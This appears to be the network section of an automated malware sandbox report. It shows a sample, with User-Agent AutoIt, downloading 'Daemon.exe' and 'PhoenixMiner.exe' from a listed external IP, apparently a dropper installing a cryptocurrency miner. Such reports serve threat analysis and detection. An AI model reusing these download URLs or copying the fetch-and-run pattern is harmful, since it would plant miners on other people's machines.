Network Analysis
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| No hosts contacted. | ||
- TCP Requests
- UDP Requests
-
-
192.168.56.101:62324 164.124.101.2:53
-
192.168.56.101:137 192.168.56.255:137
-
192.168.56.101:138 192.168.56.255:138
-
192.168.56.101:49152 239.255.255.250:3702
-
192.168.56.101:62325 239.255.255.250:3702
-
192.168.56.101:62445 239.255.255.250:1900
-
192.168.56.101:62447 239.255.255.250:3702
-
192.168.56.101:62449 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.101:123
-
GET
200
http://194.147.115.117/zzztop/Daemon.exe
REQUEST
RESPONSE
BODY
GET /zzztop/Daemon.exe HTTP/1.1
User-Agent: AutoIt
Host: 194.147.115.117
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 09 Mar 2021 04:44:25 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
Last-Modified: Tue, 10 Nov 2020 16:12:56 GMT
ETag: "e3200-5b3c2f3a11200"
Accept-Ranges: bytes
Content-Length: 930304
Content-Type: application/x-msdownload
GET
200
http://194.147.115.117/zzztop/PhoenixMiner.exe
REQUEST
RESPONSE
BODY
GET /zzztop/PhoenixMiner.exe HTTP/1.1
User-Agent: AutoIt
Host: 194.147.115.117
Cache-Control: no-cache
HTTP/1.1 200 OK
Date: Tue, 09 Mar 2021 04:44:29 GMT
Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
Last-Modified: Wed, 22 Jul 2020 01:50:38 GMT
ETag: "791a00-5aafdf76b3780"
Accept-Ranges: bytes
Content-Length: 7936512
Content-Type: application/x-msdownload
ICMP traffic
No ICMP traffic performed.
IRC traffic
| Command | Params | Type |
|---|---|---|
| CONNECT | %s HTTP/%s | client |
Suricata Alerts
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts